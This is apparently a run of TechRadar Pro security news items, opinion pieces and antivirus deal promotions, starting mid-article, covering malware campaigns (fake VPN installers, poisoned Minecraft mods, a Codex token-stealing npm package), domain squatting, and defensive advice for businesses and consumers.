Breaches will continue. Attackers will keep calling. But organizations that recognize help desks as the critical identity control points they are, and secure them accordingly, can finally close the door that's been left open for too long.

We've featured the best endpoint protection software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

I'm always on the lookout for antivirus that suits all device types, especially for those who are looking to make the most of their device and don't wanted any added bloat in their protection. This deal on Norton Antivirus Plus is exactly that.

• See all Norton Antivirus Plus deals

This antivirus deal offers single device protection with a 38% discount - and includes a few extras such as 2GB Cloud Backup and no-frills password manager.

Norton has also included its Scam Protection to defend against scams, and an AI Genie that acts as an insightful knowledge base for all things scam related.

Today's top Norton Antivirus Plus deal

Norton Antivirus Plus is a non-intrusive, lightweight way to enhance your personal security with its no-frills protection.

We regularly test and review Norton's antivirus protection, and double check out testing with third-party results from AV-Comparatives and AV-TEST. In both circumstances, it scores top marks.

The included 10GB of cloud backup is the perfect place to ensure you have a second copy of your important documents.

The included Scam Detection proactively searches for hidden threats in phishing emails or other scams, and gives you a heads up when they are detected.

Norton Antivirus Plus is currently £25 for the first year, and auto-renews at the standard price.

• Take a look at our full guide to the best antivirus software

• TikTok and Instagram Reels now being used to target victims
• "Free" Spotify, Microsoft, Adobe subscriptions targeting cash-strapped users
• Social engineering is still the top vector, but basic account security measures do a lot of the heavy lifting

A new report from ReversingLabs is warning doomscrollers of videos spreading across short-form platforms like TikTok and Instagram Reels infecting users with password-stealing malware.

The videos typically promise free access to subscriptions like Spotify Premium, Windows, Office and Adobe – an instant, telltale sign that things might not be as they seem.

Instead of receiving phishing emails, victims are instructed to open command-line tools like PowerShell, then paste and run the command shown in the video.

Watch out for this info stealing malware

When they run the command, it triggers a piece of malware to be downloaded and installed to a victim's computer. Vidar, the infostealer, targets usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal files and documents, and other sensitive information.

But more importantly, it marks a significant change – previously, email phishing campaigns have been extremely popular for gaining access to victims' credentials, with a simple click of a link leading to potential disaster. This newer method relies on victims physically inputting commands into a tool, which requires more patience.

Ultimately, the attack exploits current economic strains and the fact that consumers are looking out for cheap and free alternatives to popular subscriptions.

"This kind of social engineering is an easy way for threat actors to drive traffic off social media and onto an attacker-controlled malicious website," the researchers wrote.

Regardless, the overarching theme is that social engineering remains the clearest path for attackers to reach victims, and that's good news because there are many basic principles could-be victims can follow, like using multi-factor authentication to secure accounts.

Being wary of suspiciously cheap or free products/services and only downloading software from official vendors would also help in this instance.

• Fake X-VPN installer found to deploy credential-stealing malware
• X-VPN was not hacked; only those downloading the fake app were affected
• First targeting crypto traders, criminals widened to privacy-minded users

A new report has uncovered an uncomfortable truth for anyone who downloads software from somewhere other than the official source: a trusted-looking app can be weaponized against you.

Threat researchers at Cyderes have been tracking an active campaign that uses a fake X-VPN installer to deploy malware known as the STX RAT, which steals credentials and hands attackers remote control of an infected machine.

Crucially, this is not a breach of X-VPN, a provider that has just proved its privacy credentials with an independent no-log audit. The company's official download channels were unaffected, and the only people at risk were those who installed a malicious copy from attacker-controlled sources.

This is a stark reminder that, even if you pick one of the best VPN services around, you still need to be careful with downloads. As Google warned in its November 2025 fraud advisory, scammers are increasingly disguising malware as legitimate VPN apps to steal users' data.

How the fake X-VPN attack works

As the Cyderes' findings show, attackers took genuine X-VPN program files and slipped in one extra malicious file named CRYPTBASE.dll, a technique called DLL sideloading.

Because of a quirk in how Windows finds that file, the app appears to install normally while the hidden file injects the STX RAT malware straight into the computer's memory, leaving little trace for antivirus tools to catch.

Once active, STX RAT can harvest saved browser passwords and session tokens, collect system information, run commands remotely, and talk to its servers over ordinary encrypted web traffic, so it blends in. The fake VPN was one of 11 malicious packages tied to the operation, alongside trojanized installers for Binance, Bybit, MetaTrader 5, Exodus, and Steam.

The campaign began by targeting cryptocurrency traders, then pivoted to a trojanized X-VPN package to reach privacy-conscious users who often handle sensitive credentials. The same malware spread earlier through a brief compromise of the CPUID website, which Kaspersky linked to more than 150 victims across several countries and industries.

To its credit, X-VPN responded quickly, releasing Windows version 77.5.3 with hardened DLL loading controls. Users of the X-VPN app should update to that version or later.

How to avoid fake VPN apps

The good news is that the single most effective defense here is also the simplest and requires no technical skill. Most of these attacks fall apart the moment you refuse to download software from anywhere other than the official source.

Use the vendor's own website or an official app store, and avoid installers from third-party repositories or links sent to you. In this campaign, the files lived in an unknown Bitbucket repository.

There have been other cases of criminals using a fake free VPN to spread malware, so treat suspiciously cheap apps as a red flag.

Type the address yourself rather than clicking ads or search results, which avoids look-alike sites.

Keep software updated and run reputable security software for an extra layer of protection. Because STX RAT runs in memory and tries to evade detection, a modern antivirus or endpoint tool gives you an extra layer of protection alongside good download habits.

If you think you installed a fake VPN, assume your passwords and sessions may be exposed. Change important passwords from a clean device, sign out everywhere, and turn on two-factor authentication. A VPN is a valuable privacy tool, but only when you install the genuine article from a source you can trust.

A couple of years ago, someone searching for our company found a website that looked like ours, used a version of our name, and sold proxies we had nothing to do with.

The impersonators were already operating before we rebranded from Smartproxy to Decodo in April 2025.

They registered smartproxy.org and smartproxy.cn to catch the traffic searching for the original domain name, and the rebrand gave them an even larger pool of people who had not heard about the change.

In 2025, the World Intellectual Property Organization handled 6,282 domain name disputes, a record for the organization. Cybersquatting cases have risen 68% since 2020.

Digital squatting now moves money, steals login credentials, and pulls customers toward infrastructure tied to cybercrime. Here are five things we did, and five things any business can do, when someone copies your brand.

What digital squatting is, and why cases keep climbing

Digital squatting means registering or using a domain name in bad faith to profit from someone else's trademark. A bad actor registers a domain close to an established brand, then uses it to intercept traffic, collect payments for services they never deliver, harvest login credentials, or push malware. Most victims find out only after their money disappears.

Squatting comes in a few common forms:

1. Typosquatting registers misspellings of popular domains, such as gooogle.com instead of google.com;

2. Combosquatting adds a keyword to a real brand name, producing domains like brand-login.com or brand-deals.com;

3. TLD squatting takes the same brand name across .org, .net, .io, and .ai;

4. Homograph attacks swap in visually identical characters from other alphabets, like a Cyrillic "а" for a Latin "a".

When it happened to us

We met digital squatting as the target, not the observer. We operated as Smartproxy for seven years, and over that time, the name picked up enough recognition for impersonators to want it. They registered .org and .cn, domains with no connection to our company, our infrastructure, or our team. The site copies a version of our former name and sells proxies we have nothing to do with, catching traffic from people who searched for Smartproxy.

The squatting also shaped how we could operate in China. The obvious domains were already taken, so before the rebrand, we had to run our China presence under a separate name, smartdaili.cn. A customer in that market searching for the brand could land on an impostor site first.

The rebrand to Decodo did not end the problem. It added a fresh group of people who knew the old name and never heard about the change, which is exactly who the lookalike domains target. The harm reached real customers, and we saw it in their complaints to us.

Trustpilot reviews describe people who paid the lookalike sites, sent irreversible cryptocurrency payments, received poor support, and got low-quality service under a name they trusted.

What the Proxyway research found

The case changed shape when researchers tested the impersonator's product directly. The independent researchers have purchased a standard weekly unlimited residential plan on smartproxy.org, the same product any retail buyer can get, and measured where its traffic actually exited. The method is one any paying customer could repeat, which is part of why the result carries weight.

Proxyway sent roughly 6.96 million HTTP requests through the plan across one week, with each request landing on an endpoint that logged the exit IP address. After removing duplicates, the pool showed 2,023,029 unique IPs, of which 2,019,488 were IPv4, and 3,541 were IPv6. The success rate sat at 90.25%, in line with what the service advertised.

To find where those IPs came from, Proxyway compared the pool against a reference dataset of 16,192,293 verified IPIDEA exit nodes, observed over the 30 days ending January 29, 2026. Antoine Vastel, VP of Research at DataDome, built that dataset by routing traffic through IPIDEA endpoints himself and confirming each address as a working exit node, rather than relying on marketing claims. IPIDEA is the residential proxy network that Google's Threat Intelligence Group disrupted back in January.

The comparison surfaced 773,087 IPs present in both pools. That figure equals 38.21% of the smartproxy.org pool and 4.77% of the IPIDEA dataset. The numbers sit in the table below:

Why a 38% overlap points to shared sourcing

Residential pools rotate, so some overlap between any two services is normal. IPinfo estimates monthly IPv4 retention in residential pools at around 40%, meaning roughly four in ten addresses visible this month remain next month, while the rest cycle out. Two pools drawing from genuinely separate apps, SDKs, and device populations should not share anything close to 38% of their IPs across a few-week window.

The IPv4 address space spans more than 4 billion addresses, so an overlap at this scale would be a statistical anomaly if the sources were independent. The pool sizes point the same way. The smartproxy.org pool of about 2 million IPs is roughly an eighth of the 16.2 million IPIDEA dataset, the proportion you would expect when one provider draws from part of a larger upstream pool. Shared sourcing explains the data cleanly.

5 things you can do to combat digital squatting

Each step below works on its own. Together, they cover monitoring, prevention, legal action, search, and customer communication.

1. Monitor for lookalike domains before they reach your customers

Catching a fake domain after a customer reports it means the damage has already happened. Monitoring closes that gap.

Set up these alerts:

i) Domain registration alerts for your brand name across common TLDs and misspellings;

ii) Brand-mention monitoring across search results and social platforms;

iii) Certificate transparency logs, which flag new SSL certificates issued for domains containing your brand name.

We learned the full extent of our case through third-party research and customer complaints, later than we wanted. Monitoring would have surfaced the registrations sooner. A weekly check across the main extensions and the three or four most likely misspellings of your name catches most attempts while they’re still new.

2. Register your own domain variations first

A squatter can’t register a domain you own. Defensive registration removes the easiest targets before anyone reaches for them.

Claim the obvious variations:

i) Major TLDs such as .org, .net, .io, and .ai

ii) Common misspellings of your brand name country-code domains for markets you operate in, such as .co.uk, .de, and .cn.

Turn on registrar lock, use a reputable domain registrar, and keep your registration details current. We hit this wall directly when the obvious domains in China were already taken. Claim your namespace early, because the cost of registering domains is far lower than reclaiming them later.

3. Use your legal routes, and know their limits

Trademark law gives you specific tools against squatters. The tools work, though they move slowly, so start them early. The following is general information, not legal advice.

Your main options:

i) Register your trademark, which is the foundation for every other action;

ii) Send a cease-and-desist letter to the registrant

iii) Report abuse directly to the registrar hosting the domain.

4. Own your brand in search results

When someone searches your brand, the page they click decides whether they reach you or a copy. Ranking above the impersonator removes most of their traffic.

Make the real you easy to find:

i) Publish content that states your official domains in plain language;

ii) Keep rebranding and company information current across your site and profiles;

iii) Use structured data and verified social media profiles so search engines confirm your identity.

We published direct, on-record clarifications so anyone searching the old brand finds the truth quickly. We say it plainly: we operate at decodo.com globally and decodo.cn in China. Everything else using the old name isn’t us

5. Tell your customers, and keep telling them

Customers can’t avoid a fake site that they don’t know exists. Telling them turns your audience into a filter against the impersonator.

Reach them through every channel you have:

i) Email warnings to your existing customer list;

ii) A banner or notice on your website;

iii) A help-center article that customers find when they search for the problem;

iv) Posts on the social accounts your customers already follow.

Treat impersonation as a security problem

Brand impersonation now sits next to the infrastructure-trust problem the IPIDEA takedown exposed. A fake domain can route customers into compromised device pools, which makes this a question for security and legal teams, not just marketing. Give it a cross-functional owner who watches domains, files complaints, and updates customers on a schedule.

Google's action against IPIDEA reduced the available device pool for proxy operators by millions and, in Google's words, may carry downstream impact across affiliated resellers. Squatting that depends on that kind of infrastructure carries the same exposure. Demand transparency from any provider you buy from, and apply the same standard to your own supply chain.

We feature the best proxy sites.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• Over 100 spoofed sites mimic trusted security tools
• Campaign serves SessionGate, RemusStealer, AnimateClipper
• Primary goal appears to be traffic monetization

A large-scale malicious campaign was recently uncovered, spoofing reputable open-source security tools to harvest ad revenue and serve malware to developers and security researchers.

Security outfit Check Point Research (CPR) recently published an in-depth report, detailing the campaign. Apparently, threat actors created more than 100 websites spoofing tools such as Ghidra, dnSpy, and SpiderFoot. Visitors were routed through a Traffic Distribution System (TDS) and served multiple malware variants, including SessionGate, RemusStealer, and AnimateClipper.

“What makes this campaign especially notable is the choice of brands: a high-risk subset of sites impersonates trusted reverse-engineering tools such as Ghidra and dnSpy, used by security researchers and malware analysts,” the report reads.

Traffic acquisition and monetization

CPR describes SessionGate as a new multi-stage loader that makes it very difficult to obtain the final payload. RemusStealer is a newly emerged infostealer targeting browsers and extensions, while AnimateClipper is a cryptocurrency clipper capable of hijacking transactions across more than 20 blockchains.

Despite these websites serving multiple malware, CPR does not believe it to be the main goal. Instead, it believes the campaign’s primary objective is traffic acquisition and monetization.

“However, by embedding a gated TDS layer and funneling search traffic into it, the operators become part of a distribution chain whose downstream consumers can include malware distributors,” CPR stressed. “The same traffic pipeline that drives gray monetization can also selectively route real users to malicious payloads.”

While CPR did not say how many people were affected by this attack, it does stress that the campaign is rather large-scale. It involves more than 100 websites, as well as more than 5,000 total submissions to VirusTotal.

To defend against this campaign, and others like it, users are advised not to blindly trust search engine results, and to be careful when clicking on links, even when they’re at the very top of Google and other reputable engines.

• Weedhack spreads via poisoned Minecraft mods on YouTube
• Malware disables defenses and enables remote access
• Offered as MaaS with free and paid tiers

Cybercriminals are using YouTube to disseminate malware that targets Minecraft users and takes full control over their computers.

In January this year, security researchers McAfee Labs spotted a new malicious campaign dubbed Weedhack. In the campaign, the malicious actors created countless YouTube channels and standalone websites, through which they promoted links to Minecraft clients and mods.

With the help of Weedhack (apparently an enterprise-grade dashboard that also allows crooks to inject the malware into legitimate Minecraft mods), they created poisoned mods and clients which delivered a .JAR file called DonutDupe.jar.

Industry support

This is a Java ARchive package format used in the Java ecosystem to bundle multiple files into a single archive. This file starts a chain reaction that results in Windows Defender being disabled, system information collected, and two additional payloads dropped, which establish persistence and enable remote access.

McAfee said the campaign accumulated a total of 116,464 hits, averaging approximately 2000 to 3,000 hits per day. Most of them are located in the US, with other notable mentions including Germany, India, the UK, Italy, Vietnam, Canada, Norway, Sweden, Finland, and Spain.

McAfee describes Weedhack as a ‘Minecraft-focused Malware-as-a-service’ (MaaS). The custom payloads target versions 1.21.0 to 1.21.11 of the game, while the dashboard allows malicious actors to view stolen credentials and exfiltrated system information in a centralized manner. The MaaS is apparently being offered in Telegram channels in two tiers - free and paid, and while the free version comes with plenty of features (screenshot grabber, file exfiltrator), the paid one ($4.99 a month) offers webcam access, keylogging, and reverse shell execution.

“One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated malware for free," McAfee’s researchers explained. "This difference in cost and ease of access with detailed tutorials on how to use the malware significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. Both of these factors complement each other and make the campaign much more lethal."

Via The Hacker News

• Malware hides payload in Steam Community comments
• WordPress sites used to host backdoors
• Nearly 2,000 sites compromised since July

Security researchers from GoDaddy found a cheeky new malware campaign that used comments made by Steam Community accounts as command-and-control (C2) infrastructure.

Here is how the attack plays out: The attackers would first find vulnerable WordPress websites, or those protected by weak credentials, and use them to host PHP malware somewhere in the site’s files. For example, the sample was found in a theme’s ‘functions.php’ file. This malware contains both a JavaScript injection component, and a server-side backdoor.

Then, whenever a visitor loads the infected website, the malware contacts one of several Steam Community profiles and downloads the contents of profile comments. On surface level, these comments look harmless (albeit incoherent), but they also contain invisible Unicode characters which carry the actual payload.

Industry support

“This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload,” GoDaddy said.

The malware then extracts the characters, converts them into binary data, and reconstructs the original bytes. The researchers found that this recovered data contains a URL controlled by the attackers, which points to a domain hosting a JavaScript file spoofing a legitimate library.

The malware then uses WordPress to load the attacker-controlled JavaScript on every frontend page, which the visitors’ browsers then download and run, infecting themselves in the process.

In the campaign, there are two sets of targets - vulnerable WordPress websites, and their visitors. Since uncovering the campaign in July last year, GoDaddy said it found almost 2,000 compromised WordPress sites. Unfortunately, the research report stops short of describing what the malware does to visitors.

If you run a WordPress website, GoDaddy recommends to check for references to Steam Community URLs, external JavaScript injections, as well as outbound connections from WordPress to Steam.

Via BleepingComputer

• Researchers uncovered a malicious npm package posing as a Codex UI tool
• Attackers exfiltrated Codex authentication tokens, including non‑expiring refresh tokens
• Aikido Security also found two Android apps targeting Codex users

A newly discovered supply-chain attack on npm is targeting software developers using OpenAI Codex.

Codex is OpenAI’s coding assistant and software engineering agent that can write and review code, fix bugs, run tests, and help developers build software with nothing but plain language input.

Recently it was discovered that a tool published on both GitHub and npm was actually malicious. It is called “codexui-android”, and it is described as a remote web user interface for the Codex platform. It attracted more than 29,000 weekly downloads, so it was rather popular. One of the reasons for its popularity is because it worked as advertised and appeared legitimate. The code published on GitHub remained “clean” the whole time, meaning the public source code didn’t show any malicious behavior.

Breaking bad

However, approximately a month into its existence, the tool received an update on npm which added information-stealing code. It primarily hunted for OpenAI login credentials.

When a developer runs the tool, it looks for their Codex authentication tokens and exfiltrates them to an attacker-controlled server. One of the tokens (the refresh token) can potentially allow an attacker to continue accessing the victim’s OpenAI account for an extended period of time without needing the password.

The implications are rather dangerous, explained Aikido Security researcher Charlie Eriksen, who found and disclosed the attack. Besides the obvious - accessing the victim’s Codex sessions - the attacker can use the tokens to spend the victim’s API credits, to view projects or code they’re working on through Codex, and even impersonate the victim when interacting with OpenAI services.

"The refresh_token doesn't expire," Eriksen said. "An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface -- it's persistent, silent access to whatever that account can do."

Aikido also said it saw two Android apps, both published by the same account, who were also targeting Codex users. One is called OpenClaw Codex Claude AI Agent, running the npm package within its PRoot sandbox and sending all Codex credentials to the same, attacker-controlled server. This one had more than 50,000 downloads. The other one is called Codex and counts more than 10,000 downloads.

Via The Hacker News

As industries become more digitalized, cybercrime is evolving just as fast. In 2026, cyber security threats are no longer opportunistic; they’re intelligent, automated and highly targeted. No organisation is too small to be ignored by cybercriminals.

This is borne out in the UK Government’s Cyber Security Breaches Survey 2025, which suggests that 43% of businesses and 30% of charities reported a cyber breach or attack during the previous 12 months. That’s an astonishing 612,000 UK businesses and 61,000 charities affected.

Despite these statistics, there are ways organizations can minimize breach risk, from identifying key cyber threats to understanding how businesses can stay safe and prepare for what’s next.

The 10 Most Common Cyber Threats

Let’s start with my list of the 10 most common cyber threats businesses need to prepare for.

1. AI-powered phishing attacks

Among those that suffered a breach or cyberattack in the past 12 months, phishing remains the most common and disruptive threat – and this tactic has changed dramatically over the years.

It’s no longer obvious or poorly written; today, it’s powered by AI tools and we’re seeing attackers convincingly mimic internal communication accurately.

As a result, people are far more likely to click on malicious links, share credentials or approve fraudulent payments. In many cases, you don’t realize you’ve been compromised until it’s too late.

2. Ransomware-as-a-Service (RaaS)

With Ransomware-as-a-Service, we’re seeing criminal groups selling ready-made tools that allow even less experienced attackers to launch serious attacks. This “plug-and-play” model has dramatically increased attack volumes.

Once inside a system, ransomware encrypts critical files and attackers demand payment, usually in cryptocurrency, while some also threaten to leak stolen data to increase pressure.

3. Supply chain attacks

Instead of attacking businesses directly, cybercriminals are now targeting third-party suppliers to gain access to multiple organizations at once.

This exploits trust – and strong internal security often isn’t matched across the supply chain. One compromised vendor can trigger a domino effect across hundreds of businesses.

4. Deepfake fraud and impersonation

Deepfakes have quickly moved from novelty to a serious threat. I’m seeing attackers use AI-generated audio and video to convincingly impersonate executives, managers and clients.

This is dangerous in finance or procurement, where fraudsters can push employees to transfer funds, approve invoices, or share sensitive data – all while posing as trusted leaders.

5. Credential stuffing and password attacks

Despite growing awareness, weak and reused passwords are still one of the biggest vulnerabilities. Credential stuffing attacks use stolen login details from previous breaches and automatically test them across multiple platforms.

Because people often reuse passwords, attackers can gain access with very little effort. Once inside, they can escalate access, move through systems and quietly extract sensitive data.

6. Cloud misconfigurations

Configuration errors remain a major risk. Something as simple as an exposed storage bucket or incorrect access setting can leave sensitive data publicly accessible.

Unlike traditional breaches, these incidents often don’t involve any hacking as the data is simply left unprotected. As cloud storage environments become more complex, maintaining strong configuration hygiene is now a critical security priority.

7. IoT and connected device vulnerabilities

As the Internet of Things (IoT) expands, the attack surface grows significantly. From smart cameras and sensors to industrial machinery, many connected devices still come with limited built-in security.

Attackers can exploit these devices to access wider corporate networks. Because they’re often overlooked in traditional cyber security strategies, they represent a quiet but fast-growing risk.

8. Insider threats

Insider threats are among the hardest risks to manage. People with legitimate access can intentionally steal or leak data, but more often it’s simple human error – like sending information to the wrong person or falling for phishing attacks.

With remote and hybrid working now the norm, controlling and monitoring access has become even more complex.

9. Business email compromise (BEC)

Business email compromise is one of the most financially damaging forms of global cybercrime. Attackers infiltrate or spoof email accounts to trick employees into transferring funds or sharing sensitive data.

These attacks are highly targeted, often based on detailed research. Because they rely on social engineering rather than malware, they can easily bypass traditional security controls.

10. Zero-day exploits

We often highlight zero-day vulnerabilities as being especially dangerous. These are flaws unknown to software vendors and therefore unpatched when attackers exploit them.

Because there’s no immediate fix available, businesses often only realize they’ve been hit after a breach has already happened. And as software ecosystems grow more complex, we’re expecting the risk of undiscovered vulnerabilities to keep increasing.

How businesses can stay protected-

While cyber threats are evolving rapidly, businesses are not powerless. Strong cyber security comes down to layers of defense, constant awareness and continuous improvement.

Start with multi-factor authentication across all systems, and keep software updated and properly patched because many attacks exploit vulnerabilities that already have fixes.

Invest in employee training too, as human error is still a major weak point and staff need to recognize phishing and suspicious behavior.

Adopt a zero-trust approach, where no user or device is automatically trusted. Combine that with real-time monitoring, AI analytics and regular security testing to find weaknesses before attackers do.

Finally, ensure robust backups and recovery plans are in place, because when something goes wrong, speed matters. Cyber security isn’t a one-off project; it’s an ongoing business priority.

The future of cyber threats

Looking ahead, we expect cyber threats to grow in volume and become even more sophisticated. Artificial intelligence doesn’t sleep and it will play both sides, helping us defend systems while also powering more advanced attacks.

Breakthroughs like quantum computing could also challenge the encryption standards we rely on today, while the growing complexity of cloud, IoT, and global supply chains will only expand the attack surface.

The future of cybersecurity will come down to speed, intelligence and adaptability. Organizations that invest in proactive defense, continuous monitoring, and true cyber resilience will be best prepared for what’s next. Cyber threats aren’t just a technical issue; they’re a critical business risk.

We feature the best Antivirus Software: reviewed, tested, and ranked.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

If you are looking for an antivirus software package that you can pay for using the change between the seats on your sofa, you've come to the right place. Right now, Norton 360 Standard has dropped to £25 (was £70) from Norton for your first year.

• See all Norton 360 deals

This antivirus package can protect three devices against malware, ransomware, and hacking - and even includes cloud backup, a VPN, and a password manager.

As always, Norton has included it's hallmark Scam Protection to spot scams hidden in messages and deepfake videos, with an AI Genie to answer any questions or concerns you might have. Alongside the Standard edition, you can save on annual prices for Plus and Deluxe versions.

Today's top Norton 360 deal

Norton 360 Standard offers layers to your personal security with its array of features to protect against modern threats.

We have regularly tested and reviewed Norton's antivirus protection, and it consistently ranks in our top three picks for the best antivirus software. But if that isn't enough to convince you, consult the latest testing from AV-Comparatives and AV-TEST, where it has scored top marks.

Outside of the antivirus protection, Norton 360 Standard also helps protect your browsing when connected to public Wi-Fi networks by securing your internet traffic with a VPN. This stops hackers from intercepting your sensitive data while it travels across the web.

Outside of ransomware, your important files, photos, and videos can be lost to device failure or memory corruption. The included 10GB of cloud backup ensures you always have a second copy of your treasured memories and important documents.

Threat actors are increasingly using AI tools to craft highly convincing phishing emails and scams that can convince even the most wary of internet users. To give you the upper hand, Norton's Scam Detection comes equipped with AI to spot the hidden patterns and techniques inside complex online scams.

Covering three devices for only £25, this Norton 360 Standard deal offers peace of mind for a full year before auto-renewing at the standard price.

• Take a look at our full guide to the best antivirus software

What if the biggest cybersecurity risk is not the attack you fear most, but the weakness you forgot or never knew was there?

Many organizations worry that the next breach will come from a highly sophisticated attack so advanced that nothing could have stopped it. That fear is understandable, but the truth is often more uncomfortable.

In many cases, breaches do not begin with an unstoppable threat. They begin with a blind spot such as a missed patch, a dormant account, a device outside corporate security control or a firewall left exposed. These small gaps that are easy to overlook are exactly the kind of gaps attackers know how to find.

This is the reality, and one of the key findings from our recent report, which found that, in most cases, it is preventable security issues that open the door. Unpatched firewalls, rogue endpoints, dormant identities and misconfigurations continue to give threat actors the opportunity they need.

Why are attackers focusing more on identity than infrastructure?

Because compromising an identity is often easier and quieter than attacking a system head-on.

Once attackers compromise an identity, they are no longer forcing their way in. They are walking in through a trusted door and this is an important shift that we’re now seeing.

Stolen usernames and passwords can provide access to cloud services, email and remote access tools, and valid credentials let attackers easily blend in with normal user activity.

From there, they can escalate privileges, move laterally and turn limited access into broader control over the environment.

Sometimes, the speed with which this happens is startling. In one case, we have detected that the time between the initial breach and the execution of a full ransomware attack was just three hours.

In another real-world incident, attackers gained access through a dormant account that had originally been created for a third-party vendor and was never deactivated after the contract ended. One forgotten account eventually became the route to ransomware.

Are organizations still being exposed by endpoint and firewall gaps?

Yes, and at scale. Attackers actively look for unprotected business laptops, tablets or servers that fall outside normal security controls, because these devices can provide a path around corporate defenses.

The issue is not always a lack of security tools. In our experience, from monitoring thousands of different environments, the issue often comes down to a lack of consistent configuration. Security tools that have either been accidentally or intentionally disabled present a major security risk. The danger can be heightened as teams may have a false sense of security that comes from having the tool installed in the first place.

We also know that many organizations are trying to manage too many security tools with limited resources. And when teams are overstretched, configuration errors become more likely. That is often where attackers gain their advantage.

It also helps explain why relatively simple attack techniques remain so effective.

Threat actors continue to exploit known vulnerabilities, including some that have been around for years which can be found in legacy systems such as old servers or applications.

More striking still, from our analysis of data last year , we found that the vast majority of ransomware incidents exploited firewalls through either a CVE or a vulnerable account.

Why are modern attacks becoming harder to spot?

Some of the most malicious behavior can look annoyingly legitimate.

Threat actors are increasingly relying on living-off-the-land (LOTL) techniques, using legitimate tools already present in the environment to carry out malicious actions.

One of the clearest examples is fileless malware attacks which use PowerShell as the primary execution method.

That creates a serious challenge for defenders. PowerShell is widely used for legitimate IT administration and maintenance. When malicious activity mimics normal operations, it becomes much harder to distinguish threat behavior from business-as-usual.

This is one of the most difficult blind spots organizations face today: not the threat you can clearly see, but the one that resembles something familiar.

How could agentic AI make this worse?

AI is helping threat actors move faster, adapt quicker and scale their efforts far more efficiently.

As threat actors adopt agentic AI, the exploitation of common weaknesses is likely to accelerate. These technologies can help cybercriminals scan environments continuously, identify weak configurations in minutes and rewrite malicious code on the fly to avoid detection.

In other words, the same overlooked issues that are already dangerous today could become even more exposed tomorrow.

That is why basic security weaknesses can no longer be treated as minor issues. In an environment where attacks can be launched and adapted far more quickly, weak identity management controls, unpatched systems and unmanaged devices become far more costly.

So what should organizations do now?

Start with the basics and treat them as strategically important, not operational housekeeping.

Some of the fastest and most effective improvements include: consistent multi-factor authentication and stronger access controls; a disciplined approach to patch management and data protection and regular cybersecurity awareness training for employees

But closing blind spots fully requires more than isolated fixes because resilience depends on visibility. The more fragmented security becomes, the easier it is for critical signals to be missed. But when organizations have end-to-end visibility and coordinated management across their environment, they are far better placed to detect both the obvious weaknesses and the hidden ones.

A unified security strategy is one that combines advanced, AI-powered detection technologies with a fully automated SOC. Working with a provider who can deliver that protection 24/7 through a comprehensive managed security platform reduces the burden on internal teams.

And that is what long-term cyber resilience is really built on: not just defending against the spectacular attack, but closing the everyday gaps that attackers are counting on.

As I always say; the breach that changes everything often begins with something that seemed too small to matter.

We feature the best small and medium business (SMB) firewall software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• NordVPN identified malware and scam campaigns targeting GTA 6's fans
• The web is flooded with fake beta keys, trojanized repacks, phishing sites
• PC and Android users are the main targets

The hype around the release of GTA 6 is real, and threat actors are quick to make the most of it by targeting gamers who are disappointed by the game's delayed release. The lead-up to the release of Rockstar Games' most anticipated title makes fans vulnerable to a large number of scams, NordVPN warns.

NordVPN, which consistently ranks at the top of our list of the best VPNs, shared the findings of its Threat Intelligence team. The team discovered a wave of GTA 6-themed scams targeting eager fans with fake installers, non-existent beta keys, phishing pages, and even Android adware pretending to be a "GTA 6 beta" app.

Attackers are banking on victims clicking first and then thinking later, instilling a sense of urgency through every scam attempt.

NordVPN reveals the staggering extent of GTA 6 scams

NordVPN has revealed that PC and Android users are the primary targets of GTA 6 scams, but the threat actors may still promise access to the game on other platforms.

The game has been confirmed to launch on the PlayStation 5 and the Xbox Series X/S to start with, which threat actors are willingly abusing by promising exclusive beta keys for those consoles. Users first fill out a short form, go through a quick verification process, and then are told to either subscribe or download potentially unwanted applications (PUAs).

Windows users are also targeted by clones of well-known piracy sites. These clones distribute malware, cleverly disguised as the actual game. NordVPN downloaded one of these scam files and found it to look surprisingly legitimate, with a proper game installer that quietly launches a trojan in the background. The malware can modify your PC's RAM, connect to external servers, and download even more malware.

gta from r/GTA/comments/1t5m6cr/gta6_is_already_on_android

Android users are subjected to adware that pretends to offer access to the GTA 6 beta. This is especially clever, as the game is unlikely to ever launch on Android, but fake apps that promise access to the game are still cropping up, as shared by NordVPN as well as various Reddit users.

NordVPN downloaded one such file and found the app to be an empty shell that plays a video and then makes you download additional data. The app tries to get users to pay for a subscription or download further malware, and NordVPN traced it back to a domain that's known for distributing banking trojans, ransomware, and infostealers.

Even Rockstar Social Club accounts aren't safe: phishing pages attempt to steal login credentials, and those accounts, quickly stolen, are often resold or used for in-game scams.

How to stay safe

The general rule of thumb is not to trust anything that didn't come directly from Rockstar Games, the PlayStation Store, or the Xbox Marketplace. Never download any game-related content from third-party sites, as even a legitimate-looking site can be a scam.

Don't trust offers of free beta keys, either. Follow the official social media channels for these platforms to keep an eye out for legit offers.

Lastly, don't share your Rockstar account details on any websites other than the official site, and check the URL before you type them in.

NordVPN has just rebranded its Threat Protection suite as next-gen antivirus, so if you want to stay extra safe with a more robust security solution, it's worth checking out.

• NordVPN rebrands its app across three pillars: connect, protect, monitor
• Threat Protection's tools are now under a newly launched anti-gen antivirus
• Anti-gen antivirus tools blocked 4.8 million threats in April alone

NordVPN is officially changing. The cybersecurity giant has announced a major rebrand, shifting its focus from a standalone VPN provider to an all-in-one digital security app.

